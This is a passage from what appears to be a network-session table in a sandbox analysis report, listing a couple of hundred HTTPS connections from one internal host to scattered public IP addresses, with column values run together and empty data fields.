                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16642192.168.2.234828647.21.132.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16643192.168.2.235818460.244.229.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16644192.168.2.2345750188.205.63.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16645192.168.2.235007860.86.217.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16646192.168.2.2348012184.212.19.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16647192.168.2.235805837.178.130.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16648192.168.2.2350510174.166.131.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16649192.168.2.2351488186.139.172.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16650192.168.2.2341610136.133.73.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16651192.168.2.2357150106.187.142.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16652192.168.2.235815439.139.107.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16653192.168.2.234027038.10.26.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16654192.168.2.2360660138.208.94.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16655192.168.2.233996285.13.38.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16656192.168.2.233782257.142.221.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16657192.168.2.2354662187.22.233.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16658192.168.2.234374464.144.115.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16659192.168.2.2346850174.254.61.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16660192.168.2.2345010103.231.173.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16661192.168.2.2339374148.208.77.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16662192.168.2.2358600160.138.65.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16663192.168.2.233397653.190.188.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16664192.168.2.2359028175.81.239.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16665192.168.2.235994038.26.21.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16666192.168.2.235451863.119.89.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16667192.168.2.2333300149.139.124.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16668192.168.2.2351148120.137.236.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16669192.168.2.23398749.244.176.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16670192.168.2.23572164.61.8.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16671192.168.2.235670654.3.7.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16672192.168.2.2345748142.226.144.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16673192.168.2.2358354150.97.203.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16674192.168.2.2344674122.217.56.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16675192.168.2.235783866.22.60.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16676192.168.2.2346160139.136.216.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16677192.168.2.236074862.119.111.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16678192.168.2.233469425.86.237.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16679192.168.2.2349538171.180.222.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16680192.168.2.234295427.82.228.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16681192.168.2.233903267.164.241.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16682192.168.2.235660695.199.30.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16683192.168.2.235868427.138.206.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16684192.168.2.234349463.149.55.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16685192.168.2.2334142108.196.64.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16686192.168.2.2351454175.103.173.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16687192.168.2.233923895.93.123.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16688192.168.2.2346046169.178.203.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16689192.168.2.234758413.212.149.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16690192.168.2.2350150121.35.63.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16691192.168.2.235271273.208.68.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16692192.168.2.235974236.236.40.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16693192.168.2.2358274191.183.143.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16694192.168.2.234033423.226.24.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16695192.168.2.2348968185.31.47.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16696192.168.2.2341412135.25.1.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16697192.168.2.233749491.193.3.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16698192.168.2.2346448206.120.31.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16699192.168.2.233790253.3.97.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16700192.168.2.2348328158.159.48.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16701192.168.2.2336976196.26.94.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16702192.168.2.2342018221.40.36.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16703192.168.2.2337634124.91.71.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16704192.168.2.233729877.241.241.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16705192.168.2.2352122223.221.167.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16706192.168.2.2347138164.47.243.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16707192.168.2.2344998137.191.100.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16708192.168.2.234444458.144.159.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16709192.168.2.2358840138.102.139.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16710192.168.2.2338786146.248.105.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16711192.168.2.235707420.84.60.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16712192.168.2.233432466.175.69.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16713192.168.2.2346402137.197.19.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16714192.168.2.233510625.165.157.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16715192.168.2.235773490.124.12.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16716192.168.2.2333072222.93.152.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16717192.168.2.234675852.85.234.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16718192.168.2.23344489.6.191.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16719192.168.2.234457669.173.118.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16720192.168.2.2342316178.196.80.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16721192.168.2.235648093.98.248.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16722192.168.2.2340294106.162.137.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16723192.168.2.233966636.46.34.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16724192.168.2.235608463.45.120.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16725192.168.2.2357178211.62.160.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16726192.168.2.2348238135.216.102.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16727192.168.2.2335508209.32.74.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16728192.168.2.233876419.145.101.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16729192.168.2.2351426183.226.173.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16730192.168.2.234487094.219.97.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16731192.168.2.234707894.175.99.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16732192.168.2.2333804202.136.211.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16733192.168.2.2355714196.234.109.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16734192.168.2.234320495.181.236.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16735192.168.2.2358030197.117.100.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16736192.168.2.2354712196.191.8.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16737192.168.2.234409843.195.61.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16738192.168.2.2356848152.96.52.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16739192.168.2.235635464.190.80.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16740192.168.2.234903470.209.255.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16741192.168.2.2352858211.153.146.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16742192.168.2.234796446.171.160.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16743192.168.2.2358446112.238.241.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16744192.168.2.2345360218.159.213.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16745192.168.2.2353314151.109.37.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16746192.168.2.234739860.60.255.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16747192.168.2.2348232203.141.218.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16748192.168.2.2360412103.216.62.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16749192.168.2.2341778182.48.175.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16750192.168.2.2337776197.4.213.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16751192.168.2.2336162197.255.169.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16752192.168.2.2350048212.190.5.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16753192.168.2.2337108151.14.62.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16754192.168.2.2348054178.214.109.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16755192.168.2.235563038.34.134.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16756192.168.2.235016288.93.202.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16757192.168.2.2349032120.107.101.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16758192.168.2.2354190102.17.51.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16759192.168.2.2355406163.79.151.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16760192.168.2.235177852.255.112.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16761192.168.2.2353004146.199.21.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16762192.168.2.2359204207.9.206.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16763192.168.2.235279613.230.131.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16764192.168.2.234312853.20.30.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16765192.168.2.234934227.19.118.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16766192.168.2.2345700172.140.4.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16767192.168.2.2341630216.156.213.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16768192.168.2.2359386123.47.214.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16769192.168.2.2341040204.219.8.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16770192.168.2.2349656129.45.37.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16771192.168.2.2351442131.225.23.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16772192.168.2.236049619.208.0.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16773192.168.2.235080019.139.13.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16774192.168.2.2337156184.37.36.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16775192.168.2.2354436211.147.120.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16776192.168.2.2349594102.222.137.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16777192.168.2.2348718105.4.181.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16778192.168.2.234307475.191.15.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16779192.168.2.233918820.183.161.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16780192.168.2.233588666.172.255.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16781192.168.2.23349865.192.44.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16782192.168.2.2343334123.149.152.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16783192.168.2.2333900145.169.30.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16784192.168.2.2342404198.24.121.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16785192.168.2.235508231.150.97.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16786192.168.2.234998458.50.188.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16787192.168.2.233736646.248.161.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16788192.168.2.23335465.96.206.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16789192.168.2.234298483.86.88.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16790192.168.2.2353414111.168.126.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16791192.168.2.2352664213.122.246.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16792192.168.2.235840034.201.144.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16793192.168.2.233822485.67.18.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16794192.168.2.2351362117.60.191.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16795192.168.2.2348354195.60.135.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16796192.168.2.2346664146.31.126.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16797192.168.2.235768084.9.165.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16798192.168.2.236065079.134.171.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16799192.168.2.234422865.118.51.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16800192.168.2.2341682198.129.83.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16801192.168.2.2357280142.223.3.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16802192.168.2.2337134204.165.98.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16803192.168.2.234090063.24.61.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16804192.168.2.2360200222.47.126.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16805192.168.2.233963017.38.125.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16806192.168.2.2349400147.98.227.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16807192.168.2.2352718165.238.130.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16808192.168.2.234545638.124.237.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16809192.168.2.2342328153.172.177.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16810192.168.2.2333422125.26.73.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16811192.168.2.2344294104.22.117.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16812192.168.2.2354572208.192.55.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16813192.168.2.2356994136.89.139.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16814192.168.2.2353416196.19.233.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16815192.168.2.2335048189.94.50.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16816192.168.2.2343082126.57.181.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16817192.168.2.235380872.9.25.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16818192.168.2.233777891.238.206.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16819192.168.2.2334276210.162.129.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16820192.168.2.2342730106.111.118.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16821192.168.2.2337456199.191.82.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16822192.168.2.2352478157.207.16.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16823192.168.2.234274452.157.236.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16824192.168.2.2355580162.72.47.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16825192.168.2.2358760205.219.234.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16826192.168.2.2346114134.104.251.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16827192.168.2.233887868.94.221.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16828192.168.2.234178692.61.240.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16829192.168.2.2346308177.48.214.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16830192.168.2.2358128186.38.1.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16831192.168.2.2337660223.231.131.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16832192.168.2.2351504185.35.152.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16833192.168.2.234820884.207.67.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16834192.168.2.233359075.22.114.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16835192.168.2.235290445.246.9.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16836192.168.2.2346712111.160.151.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16837192.168.2.234822084.131.174.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16838192.168.2.234223292.168.170.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16839192.168.2.234776863.185.80.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16840192.168.2.2349536175.19.10.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16841192.168.2.233964817.170.164.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16842192.168.2.2338858142.140.199.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16843192.168.2.2354430201.202.94.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16844192.168.2.234546448.33.87.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16845192.168.2.2347640201.65.80.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16846192.168.2.234587278.95.157.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16847192.168.2.235087638.68.100.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16848192.168.2.235817620.4.252.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16849192.168.2.233473098.252.245.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16850192.168.2.2354940126.156.231.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16851192.168.2.234178452.147.252.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16852192.168.2.235403238.200.212.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16853192.168.2.235450859.244.162.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16854192.168.2.234460078.247.132.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16855192.168.2.2352724144.58.214.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16856192.168.2.2357240211.190.157.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16857192.168.2.233970458.74.242.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16858192.168.2.2336342169.211.225.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16859192.168.2.2352032164.229.94.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16860192.168.2.235673458.175.103.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16861192.168.2.2358256186.203.197.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16862192.168.2.233603282.231.106.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16863192.168.2.233601812.250.186.111443
                                          TimestampBytes transferredDirectionData


